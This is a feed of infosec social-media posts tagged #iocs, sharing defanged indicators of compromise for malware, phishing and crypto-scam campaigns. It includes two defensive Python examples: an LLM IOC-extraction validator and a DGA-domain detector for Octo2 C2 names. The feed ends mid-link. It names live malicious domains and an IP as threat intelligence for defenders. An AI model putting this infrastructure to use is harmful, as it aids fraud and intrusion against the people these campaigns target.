#iocs

Brad<p>2025-03-26 (Wednesday): <a href="https://infosec.exchange/tags/SmartApeSG" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>SmartApeSG</span></a> traffic for a fake browser update page leads to a <a href="https://infosec.exchange/tags/NetSupport" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>NetSupport</span></a> <a href="https://infosec.exchange/tags/RAT" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>RAT</span></a> infection. A zip archive for <a href="https://infosec.exchange/tags/StealC" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>StealC</span></a> was sent over the <a href="https://infosec.exchange/tags/NetSupportRAT" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>NetSupportRAT</span></a> C2 traffic.</p><p>The <a href="https://infosec.exchange/tags/StealC" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>StealC</span></a> infection uses DLL side-loading by a legitimate EXE to <a href="https://infosec.exchange/tags/sideload" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>sideload</span></a> the malicious DLL.</p><p>A <a href="https://infosec.exchange/tags/pcap" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>pcap</span></a> from an infection, the associated <a href="https://infosec.exchange/tags/malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>malware</span></a> samples, and <a href="https://infosec.exchange/tags/IOCs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>IOCs</span></a> are available at <a href="https://www.malware-traffic-analysis.net/2025/03/26/index.html" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">malware-traffic-analysis.net/2</span><span class="invisible">025/03/26/index.html</span></a></p>
Funes<p>Yo <a href="https://infosec.exchange/tags/HijackLoader" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>HijackLoader</span></a> to <a href="https://infosec.exchange/tags/RedLineStealer" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>RedLineStealer</span></a> incidents all over the place today. Make sure you're blocking 92.255.85[.]36 at the fw and bitly[.]cx unless you need to use that specific url shortening service for some strange reason.</p><p><a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infosec</span></a> <a href="https://infosec.exchange/tags/threatintel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>threatintel</span></a> <a href="https://infosec.exchange/tags/iocs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>iocs</span></a></p>
The Spamhaus Project<p>Mirai is the #1 malware family on <span class="h-card" translate="no"><a href="https://ioc.exchange/@abuse_ch" class="u-url mention" rel="nofollow noopener noreferrer" target="_blank">@<span>abuse_ch</span></a></span> URLhaus AND MalwareBazaar, with 5,363 sites reported and 3,210 samples shared.</p><p>🔗 URLHaus: <a href="https://www.spamhaus.org/malware-digest/#urlhaus" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">spamhaus.org/malware-digest/#u</span><span class="invisible">rlhaus</span></a><br>👾 MalwareBazaar: <a href="https://www.spamhaus.org/malware-digest/#malwarebazaar" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">spamhaus.org/malware-digest/#m</span><span class="invisible">alwarebazaar</span></a></p><p>But with 3,046 IOCs, find out which malware family is 🔝 of the charts on Threatfox👇 </p><p>🦊 ThreatFox: <a href="https://www.spamhaus.org/malware-digest/#threatfox" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">spamhaus.org/malware-digest/#t</span><span class="invisible">hreatfox</span></a></p><p><a href="https://infosec.exchange/tags/Mirai" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Mirai</span></a> <a href="https://infosec.exchange/tags/Malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Malware</span></a> <a href="https://infosec.exchange/tags/IOCs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>IOCs</span></a> <a href="https://infosec.exchange/tags/ThreatIntel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ThreatIntel</span></a> <a href="https://infosec.exchange/tags/abuseCH" class="mention hashtag" rel="nofollow noopener noreferrer" 
target="_blank">#<span>abuseCH</span></a></p>
Infoblox Threat Intel<p>Stay alert! These disinformation campaigns affect all of us, no matter where we are!<br> <br>Traffic Distribution Systems (TDSs) run by malicious adtech companies are seen delivering disinformation in different languages, tailored to the country the victim accesses from. They utilize subdomains to differentiate their content. The landing pages impersonate well-known brands and celebrities, aiming to deceive users. It's crucial to block these TDS domains and prevent any content they deliver.<br> <br>Here are some examples of TDS domains that redirect to these disinformation campaigns:</p><p>zoograithavaupy[.]net<br>asjynxon[.]com<br>phaunaitsi[.]net<br> <br>And here are some landing page domains associated with this campaign:</p><p>cooknove[.]com<br>healthbrit[.]com<br>foodleas[.]com<br>daily-web[.]live</p><p><a href="https://infosec.exchange/tags/phishing" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>phishing</span></a> <a href="https://infosec.exchange/tags/dns" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>dns</span></a> <a href="https://infosec.exchange/tags/scam" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>scam</span></a> <a href="https://infosec.exchange/tags/fraud" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>fraud</span></a> <a href="https://infosec.exchange/tags/disinformation" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>disinformation</span></a> <a href="https://infosec.exchange/tags/threatIntel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>threatIntel</span></a> <a href="https://infosec.exchange/tags/cybercrime" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybercrime</span></a> <a href="https://infosec.exchange/tags/threatIntelligence" class="mention hashtag" rel="nofollow 
noopener noreferrer" target="_blank">#<span>threatIntelligence</span></a> <a href="https://infosec.exchange/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybersecurity</span></a> <a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infosec</span></a> <a href="https://infosec.exchange/tags/infoblox" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infoblox</span></a> <a href="https://infosec.exchange/tags/infobloxthreatintel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infobloxthreatintel</span></a> <a href="https://infosec.exchange/tags/iocs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>iocs</span></a> <a href="https://infosec.exchange/tags/domains" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>domains</span></a> <a href="https://infosec.exchange/tags/impersonating" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>impersonating</span></a><br> <br><a href="https://urlscan.io/result/ef3f29ea-67df-4010-8a18-4638d401ab67/#summary" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">urlscan.io/result/ef3f29ea-67d</span><span class="invisible">f-4010-8a18-4638d401ab67/#summary</span></a></p>
Sophos X-Ops<p>You should also pay attention to the Address Bar if you’re prompted to log in to a service you use after opening an email attachment. </p><p>All of the <a href="https://infosec.exchange/tags/phishing" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>phishing</span></a> pages that loaded in our tests displayed the criminals’ website address, which was clearly not a <a href="https://infosec.exchange/tags/Microsoft" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Microsoft</span></a> website. The Russian URLs were pretty obvious, if you looked.</p><p>We published the list of the <a href="https://infosec.exchange/tags/phishing" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>phishing</span></a> domains and other <a href="https://infosec.exchange/tags/IOCs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>IOCs</span></a> on our Github page.</p><p><a href="https://github.com/sophoslabs/IoCs/blob/master/20250205_SVGspam.csv" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">github.com/sophoslabs/IoCs/blo</span><span class="invisible">b/master/20250205_SVGspam.csv</span></a></p><p>Stay safe, everyone.</p><p><a href="https://news.sophos.com/en-us/2025/02/05/svg-phishing/" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">news.sophos.com/en-us/2025/02/</span><span class="invisible">05/svg-phishing/</span></a></p><p>9/9</p>
Infoblox Threat Intel<p>Some days ago, one of our specialists received a call from a scammer - who even knew his name - and he didn't miss the opportunity to potentially gather some threat intelligence. <br> <br>The scammer said he was from a company called Blockchain and wanted to inform him that his Bitcoin wallet hadn't been touched for a long time. Don't you think that's really nice of Blockchain?<br> <br>Of course, our specialist knew what to do. He asked for the company website, and the scammer eagerly provided it. After running the domain through our data, it turns out it is owned by (surprise, surprise) a crypto gang running their scams out of Georgia and Israel. <br> <br>How does this scam work? This group creates extensive networks of fake trading websites promising high returns. To profit, victims just need to share their phone numbers. They are then contacted by multilingual call centers and encouraged to "invest" in crypto, AI, or other ventures. The fake website shows the victim's assets increasing in value, prompting further engagement. The criminals continue to call and entice victims to deposit more money. 
Unfortunately, the victim won't profit from this.<br> <br>As DNS experts, we have been monitoring their infrastructure for a while now, and they have 1,133 other domains such as:<br> <br>- apexcapitalmarket[.]com<br>- bitmininexpert[.]com<br>- coinfxbrokers[.]com<br>- cryptorinfo[.]com<br>- goldcapitalstocks[.]net<br>- kingstrades[.]net<br>- profxcapitalgroup[.]com<br>- smartcointrades[.]com<br>- stocktradefastminers[.]com<br>- tradeproinvest[.]com<br>- trusttrade21[.]com<br> <br>Here is a reporting reference: <a href="https://www.eurojust.europa.eu/news/support-arrest-online-scammers-georgia-and-israel" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">eurojust.europa.eu/news/suppor</span><span class="invisible">t-arrest-online-scammers-georgia-and-israel</span></a><br> <br><a href="https://infosec.exchange/tags/Infoblox" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Infoblox</span></a> <a href="https://infosec.exchange/tags/ThreatIntel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ThreatIntel</span></a> <a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infosec</span></a> <a href="https://infosec.exchange/tags/cybercrime" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybercrime</span></a> <a href="https://infosec.exchange/tags/scam" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>scam</span></a> <a href="https://infosec.exchange/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybersecurity</span></a> <a href="https://infosec.exchange/tags/infobloxthreatintel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infobloxthreatintel</span></a> <a 
href="https://infosec.exchange/tags/dns" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>dns</span></a> <a href="https://infosec.exchange/tags/domains" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>domains</span></a> <a href="https://infosec.exchange/tags/iocs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>iocs</span></a> <a href="https://infosec.exchange/tags/crypto" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>crypto</span></a> <a href="https://infosec.exchange/tags/cryptoscams" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cryptoscams</span></a></p>
The Cybersecurity Librarian :donor:<p>They should be called Indicators of Contact <a href="https://infosec.exchange/tags/IOCs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>IOCs</span></a></p><p>Rarely are they Indicators of Compromise. IOCs are potentially something.</p><p>It is more like feeling a bump while in a boat. “What hit us?” “Did it do damage?” “Are we about to sink?”</p><p>Indicators of Contact (the bump) are more interesting than Indicators of Compromise (the sinking).</p>
Thomas Roccia :verified:<p>🎁 GenAI x Sec Advent #9<br>Today I want to talk about two things: context in threat intelligence and LLM structured outputs.</p><p>What is the relation? Let me explain 🤔</p><p>🔍 Threat Intel is all about context—understanding information and making it usable. Without context, most IOCs are just noise. Context tells us why an IP address is flagged, how a threat actor operates, and what actions to take next.<br>Threat intel reports are all about providing the context of why a specific indicator is malicious. However, most of the time, you have to dig through the report to understand the context of an IOC and why it is considered malicious.</p><p>This is where LLMs and structured outputs come in. 👇</p><p>👨‍💻 Structured Outputs is a feature that makes the model consistently generate responses based on a supplied JSON Schema. This removes concerns about missing required keys or invalid values. We can define a structured JSON schema to extract the exact data we need from a report.</p><p>I built a basic example where I extract all kinds of IOCs from a threat report. </p><p>The output includes:</p><p>- Type of IOC<br>- Value of IOC <br>- Context of the IOC<br>- MITRE ID<br>- Recommended Action</p><p>You can find my code in my gist, along with the execution details below! 
👇</p><p>➡️ Code: <a href="https://gist.github.com/fr0gger/3acd7d8235421c3ca12be2b2d0dfbc26" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">gist.github.com/fr0gger/3acd7d</span><span class="invisible">8235421c3ca12be2b2d0dfbc26</span></a><br>➡️ OpenAI Structured Output:&nbsp;<a href="https://platform.openai.com/docs/guides/structured-outputs" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">platform.openai.com/docs/guide</span><span class="invisible">s/structured-outputs</span></a></p><p>Of course, if you have a structured and consistent output, you can do whatever you want with it. But that is a topic for another day! 😉 </p><p><a href="https://infosec.exchange/tags/genai" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>genai</span></a> <a href="https://infosec.exchange/tags/threatIntel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>threatIntel</span></a> <a href="https://infosec.exchange/tags/llm" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>llm</span></a> <a href="https://infosec.exchange/tags/iocs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>iocs</span></a> <a href="https://infosec.exchange/tags/mitre" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>mitre</span></a> <a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infosec</span></a> <a href="https://infosec.exchange/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybersecurity</span></a></p>
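The schema-driven IOC extraction described in this post, as an added example that is not the code in the gist. The schema, the report excerpt and the model reply are all constructed here (no OpenAI call is made) so the script runs offline; what it adds to the post is the step Structured Outputs does not perform, namely checking that each extracted value really appears in the report and that the MITRE ID is a well-formed technique ID before anything is acted on.

```python
import re

# Constructed schema in the Structured Outputs style the post relies on:
# every key required, no extra keys, closed sets for IOC type and action.
IOC_ENTRY = {
    "type": "object",
    "properties": {
        "type": {"type": "string", "enum": ["ipv4", "domain", "url", "sha256", "md5"]},
        "value": {"type": "string"},
        "context": {"type": "string"},
        "mitre_id": {"type": "string"},
        "recommended_action": {"type": "string", "enum": ["block", "monitor", "investigate"]},
    },
    "required": ["type", "value", "context", "mitre_id", "recommended_action"],
    "additionalProperties": False,
}
IOC_SCHEMA = {
    "type": "object",
    "properties": {"iocs": {"type": "array", "items": IOC_ENTRY}},
    "required": ["iocs"],
    "additionalProperties": False,
}

# Constructed excerpt of a threat report, defanged as such reports usually are.
REPORT = (
    "The loader was fetched from hxxp://update-check[.]example[.]net/a.zip and "
    "beaconed to 203.0.113[.]45 over TCP/443. The dropped DLL (sha256 " + "aa" * 32
    + ") is side-loaded by a signed executable (T1574.002)."
)

# Constructed stand-in for the model's reply: two correct entries, one host the
# report never mentions, and one entry carrying a tactic ID instead of a technique.
MODEL_RESPONSE = {"iocs": [
    {"type": "ipv4", "value": "203.0.113[.]45", "context": "C2 beacon over TCP/443",
     "mitre_id": "T1071.001", "recommended_action": "block"},
    {"type": "domain", "value": "update-check[.]example[.]net",
     "context": "hosts the loader archive", "mitre_id": "T1105", "recommended_action": "block"},
    {"type": "domain", "value": "cdn-update[.]example[.]org",
     "context": "secondary download host", "mitre_id": "T1105", "recommended_action": "block"},
    {"type": "sha256", "value": "aa" * 32, "context": "side-loaded DLL",
     "mitre_id": "TA0002", "recommended_action": "investigate"},
]}

MITRE_TECHNIQUE = re.compile(r"^T\d{4}(\.\d{3})?$")


def schema_errors(instance, schema, path="$"):
    """Minimal validator for the schema subset used above (object, array, string,
    enum, required, additionalProperties). Returns a list of error messages."""
    errors = []
    kind = schema.get("type")
    if kind == "object":
        if not isinstance(instance, dict):
            return [f"{path}: expected object"]
        props = schema.get("properties", {})
        errors += [f"{path}.{k}: missing required key"
                   for k in schema.get("required", []) if k not in instance]
        for key, val in instance.items():
            if key in props:
                errors += schema_errors(val, props[key], f"{path}.{key}")
            elif schema.get("additionalProperties") is False:
                errors.append(f"{path}.{key}: unexpected key")
    elif kind == "array":
        if not isinstance(instance, list):
            return [f"{path}: expected array"]
        for i, item in enumerate(instance):
            errors += schema_errors(item, schema["items"], f"{path}[{i}]")
    elif kind == "string":
        if not isinstance(instance, str):
            return [f"{path}: expected string"]
        if "enum" in schema and instance not in schema["enum"]:
            errors.append(f"{path}: {instance!r} not in {schema['enum']}")
    return errors


def refang(text):
    """Undo the common defanging so report text and IOC values compare equal."""
    return text.replace("[.]", ".").replace("hxxp", "http").lower()


def validate_extraction(report, response):
    """Return (accepted, rejected). The schema check is what Structured Outputs
    guarantees; the grounding and ID-format checks are what it does not."""
    errors = schema_errors(response, IOC_SCHEMA)
    if errors:
        raise ValueError("response violates schema: " + "; ".join(errors))
    haystack = refang(report)
    accepted, rejected = [], []
    for ioc in response["iocs"]:
        value = refang(ioc["value"])
        if value not in haystack:
            rejected.append((ioc, "value not present in source report"))
        elif not MITRE_TECHNIQUE.match(ioc["mitre_id"]):
            rejected.append((ioc, "malformed MITRE ATT&CK technique ID"))
        else:
            accepted.append({**ioc, "value": value})
    return accepted, rejected
```

Calling `validate_extraction(REPORT, MODEL_RESPONSE)` accepts the IP and the loader host and rejects the other two entries with their reasons; only the accepted list should feed a blocklist.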
Thomas Roccia :verified:<p>🤓 I’ve been using Maltego Graph for a while, and it’s one of the best tools for visualizing investigations and pivoting!</p><p>One of the best features is the use of Machines to automate pivoting and enrichment! 🤖</p><p>🔍 For example, you can create a Machine to automatically enrich an IP address with WHOIS info and then pivot through associated email addresses with a single click.</p><p>I have created a cheat sheet you can refer to when using Maltego 👇</p><p>I’m curious — how many of you have already created Maltego automation with Machines? </p><p><span class="h-card" translate="no"><a href="https://infosec.exchange/@Maltego" class="u-url mention" rel="nofollow noopener noreferrer" target="_blank">@<span>Maltego</span></a></span> <span class="h-card" translate="no"><a href="https://twtr.plus/users/maltegohq" class="u-url mention" rel="nofollow noopener noreferrer" target="_blank">@<span>maltegohq</span></a></span> <a href="https://infosec.exchange/tags/threatintel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>threatintel</span></a> <a href="https://infosec.exchange/tags/investigation" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>investigation</span></a> <a href="https://infosec.exchange/tags/malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>malware</span></a> <a href="https://infosec.exchange/tags/IOCS" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>IOCS</span></a> <a href="https://infosec.exchange/tags/graphs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>graphs</span></a> <a href="https://infosec.exchange/tags/maltego" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>maltego</span></a></p>
Infoblox Threat Intel<p>Continued fun in mobile threats. One of our analysts received these two different threats on her household Android phones on the same day. Usually Google does a pretty good job filtering them out, but failed here. These show two different <a href="https://infosec.exchange/tags/dns" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>dns</span></a> trends that we see in practice. The use of a shortener which redirects to an Amazon lookalike domain -- we often just see the lookalike in the message.<br> <br>The Amazon one led to amazonfey[.]co and the same actor had over 300 active lookalikes to Amazon and other services. These guys are fairly easy to track in DNS using fingerprinting. Blocking at DNS providers will help reduce where Google, Apple, and other service providers miss some.<br> <br>The Wells Fargo / Apple alert used an old domain -- a "drop catch" that has been picked up by a threat actor. This might look obvious but people work on alarm -- if you have a Wells Fargo account and see a big charge, you might just click without thinking. 
<br> <br><a href="https://infosec.exchange/tags/dns" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>dns</span></a> <a href="https://infosec.exchange/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybersecurity</span></a> <a href="https://infosec.exchange/tags/InfobloxThreatIntel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>InfobloxThreatIntel</span></a> <a href="https://infosec.exchange/tags/Infoblox" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Infoblox</span></a> <a href="https://infosec.exchange/tags/dropCatchDomains" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>dropCatchDomains</span></a> <a href="https://infosec.exchange/tags/IOCs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>IOCs</span></a> <a href="https://infosec.exchange/tags/threatIntel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>threatIntel</span></a> <a href="https://infosec.exchange/tags/cybercrime" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybercrime</span></a> <a href="https://infosec.exchange/tags/lookalikes" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>lookalikes</span></a></p>
Infoblox Threat Intel<p>The banking trojan, Octo2, now employs a Domain Generation Algorithm (DGA)!<br> <br>The new variant of the Octo (ExobotCompact) banking trojan, Octo2, is targeting mobile users with several new advanced features. This malware is known for disguising itself as legitimate apps, taking control of the victim’s device to steal sensitive information and commit on-device fraud. For now, the malware has been seen in the wild in Italy, Poland, Moldova, and Hungary, masquerading as apps like NordVPN and Google Chrome. Unfortunately, given its history, it is expected to become global soon.<br> <br>This new variant, investigated by ThreatFabric, features enhanced functionalities, including a Domain Generation Algorithm (DGA) that dynamically changes its command-and-control (C2) server addresses, making it significantly harder to detect.<br> <br>Here are some domains associated with this new variant that we have in our collection:</p><p>5106c5dbc9e0d004489af35abec41027[.]info<br>7729f264dc01834757c9f06f2d313e28[.]com<br>a414602e421935fd057be3c06a3d080c[.]info<br>53cd7bfaebd095ad083c34f007469ff5[.]biz<br>5fa5009fb05a5cee1abd7a2dbb6eb948[.]net<br>8921267492331aabcb4394c801d4e490[.]shop<br>bbad1dcadd801af41da97ecf292b147f[.]xyz<br>c80530d100da2e953c21c55d7cb4b86a[.]info<br>ffce9e39ccdfbe3f1e88806545321ad7[.]org<br> <br>ThreatFabric report: <a href="https://www.threatfabric.com/blogs/octo2-european-banks-already-under-attack-by-new-malware-variant" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">threatfabric.com/blogs/octo2-e</span><span class="invisible">uropean-banks-already-under-attack-by-new-malware-variant</span></a></p><p><a href="https://infosec.exchange/tags/dns" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>dns</span></a> <a href="https://infosec.exchange/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener 
noreferrer" target="_blank">#<span>cybersecurity</span></a> <a href="https://infosec.exchange/tags/InfobloxThreatIntel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>InfobloxThreatIntel</span></a> <a href="https://infosec.exchange/tags/Infoblox" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Infoblox</span></a> <a href="https://infosec.exchange/tags/Octo" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Octo</span></a> <a href="https://infosec.exchange/tags/Octo2" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Octo2</span></a> <a href="https://infosec.exchange/tags/ExobotCompact" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>ExobotCompact</span></a> <a href="https://infosec.exchange/tags/Malware" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>Malware</span></a> <a href="https://infosec.exchange/tags/IOCs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>IOCs</span></a> <a href="https://infosec.exchange/tags/threatintel" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>threatintel</span></a> <a href="https://infosec.exchange/tags/cybercrime" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>cybercrime</span></a> <a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infosec</span></a> <a href="https://infosec.exchange/tags/dga" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>dga</span></a> <a href="https://infosec.exchange/tags/c2" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>c2</span></a> <a href="https://infosec.exchange/tags/Trojan" class="mention hashtag" rel="nofollow noopener noreferrer" 
target="_blank">#<span>Trojan</span></a></p>
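A detection heuristic built from the domains quoted in this post, as an added example (not Infoblox's or ThreatFabric's code): every listed C2 domain has a registrable label of exactly 32 lowercase hex characters, so a resolver log can be triaged on that shape. The nine domains are the ones from the post; the DNS log lines and client addresses are constructed.

```python
import re
from collections import Counter

# Every C2 domain quoted in the post has an MD5-sized (32 hex chars) registrable
# label under a cheap gTLD. That label shape is the whole heuristic here.
HEX32 = re.compile(r"^[0-9a-f]{32}$")

# The nine domains quoted in the post, kept defanged as published.
OCTO2_OBSERVED = [
    "5106c5dbc9e0d004489af35abec41027[.]info",
    "7729f264dc01834757c9f06f2d313e28[.]com",
    "a414602e421935fd057be3c06a3d080c[.]info",
    "53cd7bfaebd095ad083c34f007469ff5[.]biz",
    "5fa5009fb05a5cee1abd7a2dbb6eb948[.]net",
    "8921267492331aabcb4394c801d4e490[.]shop",
    "bbad1dcadd801af41da97ecf292b147f[.]xyz",
    "c80530d100da2e953c21c55d7cb4b86a[.]info",
    "ffce9e39ccdfbe3f1e88806545321ad7[.]org",
]


def registrable_label(host):
    """Second-level label of a hostname, tolerating defanging and a trailing dot.
    Assumes single-label public suffixes, as in every domain above; for suffixes
    such as co.uk a public-suffix list would be needed instead of labels[-2]."""
    labels = host.replace("[.]", ".").lower().rstrip(".").split(".")
    return labels[-2] if len(labels) >= 2 else None


def looks_like_octo2_dga(host):
    """True when the registrable label is a 32-char lowercase hex string.
    Hex labels that are merely subdomains (common on CDNs) are deliberately
    ignored; an 'any hex label' rule would drown in false positives."""
    label = registrable_label(host)
    return bool(label) and HEX32.match(label) is not None


# Constructed resolver log lines: "<timestamp> <client> <qtype> <qname>".
SAMPLE_LOG = """\
2025-01-10T10:02:11Z 10.0.0.12 A 7729f264dc01834757c9f06f2d313e28.com.
2025-01-10T10:02:12Z 10.0.0.12 A www.google.com.
2025-01-10T10:02:40Z 10.0.0.12 A ffce9e39ccdfbe3f1e88806545321ad7.org.
2025-01-10T10:03:02Z 10.0.0.31 A 0f3c9a2b1e4d5c6f7a8b9c0d1e2f3a4b.cdn.example.com.
2025-01-10T10:03:15Z 10.0.0.12 AAAA 7729f264dc01834757c9f06f2d313e28.com.
2025-01-10T10:04:59Z 10.0.0.45 A bbad1dcadd801af41da97ecf292b147f.xyz.
"""


def triage_dns_log(log_text):
    """Return {client: Counter(flagged qnames)} so a hunt sees which clients
    resolved DGA-shaped names and how often, not just a flat list of names."""
    hits = {}
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines rather than abort the whole hunt
        _ts, client, _qtype, qname = parts
        if looks_like_octo2_dga(qname):
            hits.setdefault(client, Counter())[qname.rstrip(".")] += 1
    return hits
```

On the sample log, client 10.0.0.12 is flagged twice for the .com name and once for the .org name, 10.0.0.45 once, and the hex CDN subdomain under example.com is correctly left alone.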
Colin Cowie<p>Google tracking template abuse never fails to shock me. </p><p>Despite this ad looking like an official link to Google's app store, it actually redirects you to a site delivering an evasive <a href="https://infosec.exchange/tags/infostealer" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>infostealer</span></a> with zero detections on VirusTotal. Sophos is now detecting this sample as "Troj/Mdrop-KAA" and "Troj/Steal-DYZ" for the payload.</p><p>Check out <span class="h-card" translate="no"><a href="https://infosec.exchange/@jeromesegura" class="u-url mention" rel="nofollow noopener noreferrer" target="_blank">@<span>jeromesegura</span></a></span>'s recent blog on this campaign:</p><p><a href="https://www.malwarebytes.com/blog/news/2024/07/threat-actor-impersonates-google-via-fake-ad-for-authenticator" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">malwarebytes.com/blog/news/202</span><span class="invisible">4/07/threat-actor-impersonates-google-via-fake-ad-for-authenticator</span></a> </p><p><a href="https://infosec.exchange/tags/IOCs" class="mention hashtag" rel="nofollow noopener noreferrer" target="_blank">#<span>IOCs</span></a> :<br>- axi-card[.]us (redirection)<br>- chromeweb-authenticatr[.]com (fake site)<br>- <a href="https://www.virustotal.com/gui/file/ba3cdc5190b44da96e5ecb5f39e2cbe3713984dc8062cdab679c759de51500b1/details" rel="nofollow noopener noreferrer" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">virustotal.com/gui/file/ba3cdc</span><span 